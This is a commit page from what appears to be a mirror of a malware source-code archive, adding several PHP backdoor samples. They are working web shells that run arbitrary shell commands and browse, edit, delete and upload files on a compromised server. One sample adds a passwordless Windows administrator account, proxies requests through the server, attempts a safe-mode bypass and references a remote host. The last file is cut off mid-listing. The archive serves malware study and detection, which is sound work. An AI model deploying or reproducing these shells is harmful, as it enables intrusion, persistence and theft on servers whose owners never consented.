Mirrors
/
vxug-MalwareSourceCode
mirror of https://github.com/vxunderground/MalwareSourceCode
13
1
Fork 0
Code Releases Activity

Add files via upload

This commit is contained in:
vxunderground 2020-10-09 22:05:41 -05:00 committed by GitHub
parent 27f87bc75b
commit 23c136b0eb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
96 changed files with 23882 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
PHP/Backdoor.PHP.Agent.bf Normal file
View File

File diff suppressed because one or more lines are too long

181
PHP/Backdoor.PHP.Agent.bg Normal file
View File

@ -0,0 +1,181 @@
<?
/*
Backdoor php v0.1
Coded By Charlichaplin
charlichaplin@gmail.com
Join me: irc.fr.worldnet.net #s-c
Greetz: My dog :)
*/
class backdoor {
var $pwd;
var $rep;
var $list = array();
var $file;
var $edit;
var $fichier;
var $del;
var $shell;
var $proxy;
function dir() {
if(!empty($this->rep)) {
$dir = opendir($this->rep);
} else {
$dir = opendir($this->pwd);
}
while($f = readdir($dir)) {
if ($f !="." && $f != "..") {
$this->list[] = $f;
}
}
}
function view() {
$this->file = htmlentities(highlight_file($this->file));
}
function edit() {
if(!is_writable($this->edit)) {
echo "Ecriture impossible sur le fichier";
} elseif(!file_exists($this->edit)) {
echo "Le fichier n'existe pas ";
} elseif(!$this->fichier) {
$fp = fopen($this->edit,"r");
$a = "";
while(!feof($fp)) {
$a .= fgets($fp,1024);
}
echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$this->edit."\"><textarea name=\"fichier\" cols=\"50\" rows=\"20\">".htmlentities($a)."</textarea><input name=\"Submit\" type=\"submit\"></form>";
} else {
$fp = fopen($this->edit,"w+");
fwrite($fp, $this->fichier);
fclose($fp);
echo "Le fichier a été modifié";
}
}
function del() {
if(is_file($this->del)) {
if(unlink($this->del)) {
echo "Fichier supprimé";
} else {
echo "Vous n'avez pas les droits pour supprimer ce fichier";
}
} else {
echo $this->del." n'est pas un fichier";
}
}
function shell() {
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."\"><input name=\"shell\" type=\"text\"><input type=\"submit\" name=\"Shell\"></form><br>";
system($this->shell);
}
function proxy($host,$page) {
$fp = fsockopen($host,80);
if (!$fp) {
echo "impossible d'etablir un connection avec l'host";
} else {
$header = "GET ".$page." HTTP/1.1\r\n";
$header .= "Host: ".$host."\r\n";
$header .= "Connection: close\r\n\r\n";
fputs($fp,$header);
while (!feof($fp)) {
$line = fgets($fp,1024);
echo $line;
}
fclose($fp);
}
}
function ccopy($cfichier,$cdestination) {
if(!empty($cfichier) && !empty($cdestination)) {
copy($cfichier, $cdestination);
echo "Le fichier a été copié";
} else {
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>";
}
}
}
if(!empty($_REQUEST['rep'])) {
$rep = $_REQUEST['rep']."/";
}
$pwd = $_SERVER['SCRIPT_FILENAME'];
$pwd2 = explode("/",$pwd);
$file = $_REQUEST['file'];
$edit = $_REQUEST['edit'];
$fichier = $_POST['fichier'];
$del = $_REQUEST['del'];
$shell = $_REQUEST['shell'];
$proxy = $_REQUEST['proxy'];
$copy = $_REQUEST['copy'];
$cfichier = $_POST['cfichier'];
$cdestination = $_POST['cdestination'];
$n = count($pwd2);
$n = $n - 1;
$pwd = "";
for ($i = 0;$i != $n;$i = $i+1) {
$pwd .= "/".$pwd2[$i];
}
if($proxy) {
$host2 = explode("/",$proxy);
$n = count($host2);
$host = $host2[2];
$page = "";
for ($i = 3;$i != $n;$i = $i+1) {
$page .= "/".$host2[$i];
}
echo $page;
}
echo "<HTML><HEAD><TITLE>Index of ".$pwd."</TITLE>";
$backdoor = new backdoor();
$backdoor->pwd = $pwd;
$backdoor->rep = $rep;
$backdoor->file = $file;
$backdoor->edit = $edit;
$backdoor->fichier = $fichier;
$backdoor->del = $del;
$backdoor->shell = $shell;
$backdoor->proxy = $proxy;
echo "<TABLE><TR><TD bgcolor=\"#ffffff\" class=\"title\"><FONT size=\"+3\" face=\"Helvetica,Arial,sans-serif\"><B>Index of ".$backdoor->pwd."</B></FONT>";
$backdoor->dir();
echo "</TD></TR></TABLE><PRE>";
echo "<a href=\"".$_SERVER['PHP_SELF']."?shell=id\">Executer un shell</a> ";
echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy=http://www.cnil.fr/index.php?id=123\">Utiliser le serveur comme proxy</a> ";
echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <br>";
echo "<IMG border=\"0\" src=\"/icons/blank.gif\" ALT=\" \"> <A HREF=\"\">Name</A> <A HREF=\"\">Last modified</A> <A HREF=\"\">Size</A> <A HREF=\"\">Description</A>";
echo "<HR noshade align=\"left\" width=\"80%\">";
if($file) {
$backdoor->view();
} elseif($edit) {
$backdoor->edit();
} elseif($del) {
$backdoor->del();
} elseif($shell) {
$backdoor->shell();
}elseif($proxy) {
$backdoor->proxy($host,$page);
}elseif($copy == 1) {
$backdoor->ccopy($cfichier,$cdestination);
} else {
echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."../")."\">Parent Directory</A> ".date("r",realpath($rep."../"))." - <br>";
foreach ($backdoor->list as $key => $value) {
if(is_dir($rep.$value)) {
echo "[DIR]<A HREF=\"".$_SERVER['PHP_SELF']."?rep=".$rep.$value."\">".$value."/</A> ".date("r",filemtime($rep.$value))." - <br>";
} else {
echo "[FILE]<A HREF=\"".$_SERVER['PHP_SELF']."?file=".$rep.$value."\">".$value."</A> <a href=\"".$_SERVER['PHP_SELF']."?edit=".$rep.$value."\">(edit)</a> <a href=\"".$_SERVER['PHP_SELF']."?del=".$rep.$value."\">(del)</a> ".date("r",filemtime($rep.$value))." 1k <br>";
}
}
}
echo "</PRE><HR noshade align=\"left\" width=\"80%\">";
echo "<center><b>Coded By Charlichaplin</b></center>";
echo "</BODY></HTML>";

73
PHP/Backdoor.PHP.Agent.bh Normal file
View File

@ -0,0 +1,73 @@
<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
$UNAME = @php_uname();
echo "NAME:$UNAME<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
exit;

72
PHP/Backdoor.PHP.Agent.bi Normal file
View File

@ -0,0 +1,72 @@
<?
$dir = @getcwd();
echo "Mic22<br>";
$ker = @php_uname();
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
exit;

59
PHP/Backdoor.PHP.Agent.bj Normal file
View File

@ -0,0 +1,59 @@
<?
$dir = @getcwd();
$ker = @php_uname();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
?>

50
PHP/Backdoor.PHP.Agent.bk Normal file
View File

@ -0,0 +1,50 @@
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;}
else{
$contrs=1;
}}
if($contrs == 0){
echo("FEELCOMZ"."SAFEOFF");
}else{
echo("FEELCOMZ"."SAFEON");
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
?>

592
PHP/Backdoor.PHP.Agent.bl Normal file
View File

@ -0,0 +1,592 @@
<html>
<head>
<meta http-equiv="Content-Language" content="pt-br">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="AoD">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>***BY PETERSON THE GREATEST CMD***</title>
<style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
body,td {
font-family: verdana;
font-size: 8pt;
background-color: #FFCC00;
}
a{
color: #0000FF;
text-decoration: none;
}
a:hover {
color: #FF0000;
text-decoration: underline;
}
</style>
</head>
<body >
<center><h2> --== by MS flood_ ==-- </h2></center>
<?php
@set_time_limit(0);
$string = $_SERVER['QUERY_STRING'];
$mhost = 'http://nodan.110mb.com/cmds.txt?';
$host_all = explode("$mhost", $string);
$s1 = $host_all[0];
$fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
$OS = @PHP_OS;
$IpServer = '127.0.0.1';
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
else { $SafeMode = "<i>$SafeMode</i>"; }
$btname = '';
$bt = '';
$dc = '';
$newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup
&quot;Administrators&quot; /add Admin;net localgroup &quot;Users&quot; /del Admin';
$bn = '';
// Java Script
echo "<script type=\"text/javascript\">";
echo "function ChMod(chdir, file) {";
echo "var o = prompt('Chmod: - Contoh: 0777', '');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file +
'&chmod=' + o + \"\";";
echo "}";
echo "}";
echo "function Rename(chdir, file, mode) {";
echo "if (mode == 'edit') {";
echo "var o = prompt('Ganti Nama File '+ file + ' menjadi:', '');";
echo "}";
echo "else {";
echo "var o = prompt('Ganti Nama Folder '+ file + ' menjadi:', '');";
echo "}";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file +
'&newname=' + o + '&mode=' + mode +\"\";";
echo "}";
echo "}";
echo "function Copy(chdir, file) {";
echo "var o = prompt('Copied for:', '/tmp/' + file);";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file +
'&fcopy=' + o + \"\";";
echo "}";
echo "}";
echo "function Mkdir(chdir) {";
echo "var o = prompt('Nama Folder?', 'Folder_Baru');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o +
\"\";";
echo "}";
echo "}";
echo "function Newfile(chdir) {";
echo "var o = prompt('Nama File?', 'File_Baru.txt');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o +
\"\";";
echo "}";
echo "}";
echo "</script>";
// End JavaScript
/* Functions */
function cmd($CMDs) {
$CMD[1] = '';
exec($CMDs, $CMD[1]);
if (empty($CMD[1])) {
$CMD[1] = shell_exec($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = passthru($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = system($CMDs);
}
elseif (empty($CMD[1])) {
$handle = popen($CMDs, 'r');
while(!feof($handle)) {
$CMD[1][] .= fgets($handle);
}
pclose($handle);
}
return $CMD[1];
}
if (@$_GET['chdir']) {
$chdir = $_GET['chdir'];
} else {
$chdir = getcwd()."/";
}
if (@chdir("$chdir")) {
$msg = "<font color=\"#008000\"> Pintu Masuk ke Direktori, OK!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal masukkan ke folder!</font>";
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
$chdir = str_replace(chr(92), chr(47), $chdir);
if (@$_GET['action'] == 'upload') {
$uploaddir = $chdir;
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .
$_FILES['userfile']['name'])) {
$msg = "<font color=\"#008000\"><font
color=\"#000080\">{$_FILES['userfile']['name']}</font>, Upload File Berjaya.
</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Upload File Gagal.</font>";
}
}
elseif (@$_GET['action'] == 'mkdir') {
$newdir = $_GET['newdir'];
if (@mkdir("$chdir"."$newdir")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>, folder
berhasil dibuat. </font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Pembuatan folder gagal.</font>";
}
}
elseif (@$_GET['action'] == 'newfile') {
$newfile = $_GET['newfile'];
if (@touch("$chdir"."$newfile")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>, berhasil
dibuat! </font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Tak Boleh Buat File!</font>";
}
}
elseif (@$_GET['action'] == 'del') {
$file = $_GET['file']; $type = $_GET['type'];
if ($type == 'file') {
if (@unlink("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil
menghapus arsip (file)!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal menghapuskan File (file)!</font>";
}
} elseif ($type == 'dir') {
if (@rmdir("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil
menghapus folder!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal menghapuskan folder!</font>";
}
}
}
elseif (@$_GET['action'] == 'chmod') {
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
if (@chmod ("$file", $chmod)) {
$msg = "<font color=\"#008000\">Chmod dari</font> <font
color=\"#000080\">{$_GET['file']}</font> <font color=\"#008000\">berubah menjadi</font>
<font color=\"#000080\">$chmod</font> <font color=\"#008000\">: Sukses!</font>";
} else {
$msg = '<font color=\"#FF0000\">Error: Gagal mengubah chmod.</font>';
}
}
elseif (@$_GET['action'] == 'rename') {
$file = $_GET['file']; $newname = $_GET['newname'];
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
$msg = "<font color=\"#008000\">Archive</font> <font color=\"#000080\">{$file}</font>
<font color=\"#008000\">named for</font> <font color=\"#000080\">{$newname}</font> <font
color=\"#008000\">successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal menukar File.</font>";
}
}
elseif (@$_GET['action'] == 'copy') {
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
if (@copy("$file", "$copy")) {
$msg = "<font color=\"#000080\">{$file}</font>, <font color=\"#008000\">disalin
menjadi</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">
Berhasil!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal menyalin </font> <font
color=\"#000000\">{$file}</font> <font color=\"#FF0000\">menjadi</font> <font
color=\"#000000\">{$copy}</font></font>";
}
}
/* Parte Atualiza 02:48 12/2/2006 */
elseif (@$_GET['action'] == 'cmd') {
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
$cmd = stripslashes(trim($cmd));
$result_arr = cmd($cmd);
$afim = count($result_arr); $acom = 0; $msg = '';
$msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida
Console';font-size: 12px;margin 2\">Hasil : <b>".$cmd."</b></p>";
if ($result_arr) {
while ($acom <= $afim) {
$msg .= "<p style=\"color: #008000;text-align: left;font-family:
'Lucida Console';font-size: 12px;margin 2\"> ".@$result_arr[$acom]."</p>";
$acom++;
}
}
else {
$msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida
Console';font-size: 12px;margin 2\">Error: Gagal Menjalankan perintah.</p>";
}
}
elseif (@$_GET['action'] == 'safemode') {
if (@!extension_loaded('shmop')) {
echo "Loading... module</br>";
if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
@dl('php_shmop.dll');
} else {
@dl('shmop.so');
}
}
if (@extension_loaded('shmop')) {
echo "Module: <b>shmop</b> loaded!</br>";
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
$data="\x00";
$offset=-3842685;
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of
data\n"; }
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
echo passthru("id");
shmop_close($shm_id);
} else { echo "Module: <b>shmop</b> tidak dimuat!</br>"; }
}
elseif (@$_GET['action'] == 'zipen') {
$file = $_GET['file'];
$zip = @zip_open("$chdir"."$file");
$msg = '';
if ($zip) {
while ($zip_entry = zip_read($zip)) {
$msg .= "Name: " . zip_entry_name($zip_entry) . "\n";
$msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n";
$msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n";
$msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n";
if (zip_entry_open($zip, $zip_entry, "r")) {
echo "File Contents:\n";
$buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
echo "$buf\n";
zip_entry_close($zip_entry);
}
echo "\n";
}
zip_close($zip);
}
}
elseif (@$_GET['action'] == 'edit') {
$file = $_GET['file'];
$conteudo = '';
$filename = "$chdir"."$file";
$conteudo = @file_get_contents($filename);
$conteudo = htmlspecialchars($conteudo);
$back = $_SERVER['HTTP_REFERER'];
echo "<p align=\"center\">Editing {$file} ...</p>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:
collapse\" width=\"100%\" id=\"editacao\">";
echo "<tr>";
echo "<td width=\"100%\">";
echo "<form method=\"POST\"
action=\"{$fstring}&amp;action=save&amp;chdir={$chdir}&amp;file={$file}\">";
echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\"
s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana;
font-size: 8pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
echo "<p align=\"center\">";
echo "<input type=\"submit\" value=\"Simpan\" name=\"B2\" style=\" border: 1px solid
#000000\"> ";
echo "<input type=\"button\" value=\"Tutup\"
Onclick=\"javascript:window.location='{$fstring}&amp;chdir={$chdir}'\" name=\"B1\" style=\"
border: 1px solid #000000\"> ";
echo "</form>";
echo "</td>";
echo "</tr>";
echo "</table>";
}
elseif (@$_GET['action'] == 'save') {
$filename = "$chdir".$_GET['file'];
$somecontent = $_POST['S1'];
$somecontent = stripslashes(trim($somecontent));
if (is_writable($filename)) {
@$handle = fopen ($filename, "w");
@$fw = fwrite($handle, $somecontent);
@fclose($handle);
if ($handle && $fw) {
$msg = "<font color=\"#000080\">{$_GET['file']}</font>, <font
color=\"#008000\">berhasil diedit!</font>";
}
} else {
$msg = "<font color=\"#000000\">{$_GET['file']},</font> <font color=\"#FF0000\">tidak
bisa ditulisi!</font>";
}
}
// Informaçs
$cmdget = '';
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
$cmdget = htmlspecialchars($cmdget);
function asdads() {
$asdads = '';
if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
return $asdads;
}
echo "<form method=\"POST\" name=\"cmd\"
action=\"{$fstring}&amp;action=cmd&amp;chdir=$chdir\">";
echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
echo "<legend>Informasi</legend>";
echo "<br><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:
collapse; font-family: Verdana; font-size: 10px\" width=\"100%\">";
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>Sistem </b> </td> ";
echo "<td width=\"92%\">: {$OS}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>Nama </b></td> ";
echo "<td width=\"92%\">: {$UNAME}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>PHP </b></td> ";
echo "<td width=\"92%\">: {$PHPv}, <b> Safe Mode :</b> {$SafeMode}</td>";
echo "</tr>";
if (strtoupper(substr($OS, 0,3) != 'WIN')) {
$Methods = asdads();
if ($Methods == '') { $Methods = "???"; }
echo "<tr>";
echo "<td width=\"8%\">";
echo "<b>Methods </b></td> ";
echo "<td width=\"92%\">: {$Methods}</td>";
echo "</tr>";
}
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>IP </b></td> ";
echo "<td width=\"92%\">: {$IpServer}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>Perintah </b></td> ";
echo "<td width=\"92%\">: <input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\"
style=\" font-size: 8 pt; border: 1px solid #000000\"> <input type=\"submit\"
name=\"action\" value=\"Kirim\" style=\" font-size: 8 pt; border: 1px solid
#000000\"></td>";
echo "</tr>";
echo "</table><br>";
echo "</fieldset></form>";
// Dir
echo "<form method=\"POST\" action=\"{$fstring}&amp;action=upload&amp;chdir=$chdir\"
enctype=\"multipart/form-data\">";
echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\"
s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid
#000000; padding: 2\">";
if (is_writable("$chdir")) {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\"
onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd=$newuser\">Remote
Access</a></legend>";
} else {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\"
onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=yes\">Kembali</a></legend
>";
}
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\"
onclick=\"Mkdir('{$chdir}');\">Foldr Baru</a> | <a href=\"#[New File]\"
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd={$newuser}\">Remote
Access</a></legend>";
} else {
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\"
onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=no\">Kembali</a></legend>
";
}
}
if (@!$handle = opendir("$chdir")) {
echo " Gue gak bisa masuk folder, <a href=\"{$fstring}\">Klik sini!</a> untuk Kembali ke folder ori!</br>";
}
else {
echo " <table border=\"0\" cellpadding=\"5\" cellspacing=\"0\" width=\"100%\">";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\"> Upload:";
echo " <input type=\"file\" name=\"userfile\" size=\"65\" style=\" border-style:
solid; border-width: 1\">";
echo " <input type=\"submit\" value=\"Kirim\" name=\"B1\" style=\" border: 1px solid
#000000\"></td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\"> </td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\">";
if (@!$msg) {
echo " <p align=\"left\">Messages</td>";
} else {
echo " <p align=\"left\">$msg</td>";
}
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\"> </td>";
echo " </tr></table> ";
echo " <table border=\"1\" cellpadding=\"2\" cellspacing=\"0\" width=\"100%\">";
echo " <tr bgcolor=\"#FF6600\" align=\"center\"> ";
echo " <td > Permision</td>";
echo " <td > Nama File </td>";
echo " <td > Kapasiti </td>";
echo " <td > Perintah</td>";
echo " </tr>";
$colorn = 0;
while (false !== ($file = readdir($handle))) {
if ($file != '.') {
if ($colorn == 0) {
$color = "style=\"background-color: #FF9900\"";
}
elseif ($colorn == 1) {
$color = "style=\"background-color: #FFCC33\"";
}
if (@is_dir("$chdir"."$file")) {
$file = $file.'/';
$mode = 'chdir';
} else {
$mode = 'edit';
}
if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
$chdir .= '/';
}
if ($file == '../') {
$lenpath = strlen($chdir); $baras = 0;
for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
$chdir_ = explode("/", $chdir);
$chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
}
$perms = @fileperms ("$chdir"."$file");
if ($perms == '') {
$perms = '???';
}
$size = @filesize ("$chdir"."$file");
$size = $size / 1024;
$size = explode(".", $size);
if (@$size[1] != '') {
$size = $size[0].'.'.@substr("$size[1]", 0, 2);
} else {
$size = $size[0];
}
if ($size == 0) {
if ($mode == 'chdir') {
$size = '???';
}
}
echo "<tr>";
echo "<td align=\"center\" $color> $perms</td>";
if (@is_writable ("$chdir"."$file")) {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td $color> <b><a href=\"{$fstring}&amp;chdir=$chdirpox\"><font
color=\"#008000\">$file</font></a></b> </td>";
} else {
echo "<td $color> <b><a href=\"{$fstring}&amp;chdir={$chdir}{$file}\"><font
color=\"#008000\">$file</font></a> </b></td>";
}
} else {
if (is_readable("$chdir"."$file")) {
echo "<td $color> <a
href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a> </td>";
} else {
echo "<td $color> $file </td>";
}
}
}
else {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td $color> <a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a>
</td>";
} else {
echo "<td $color> <a
href=\"{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></td>";
}
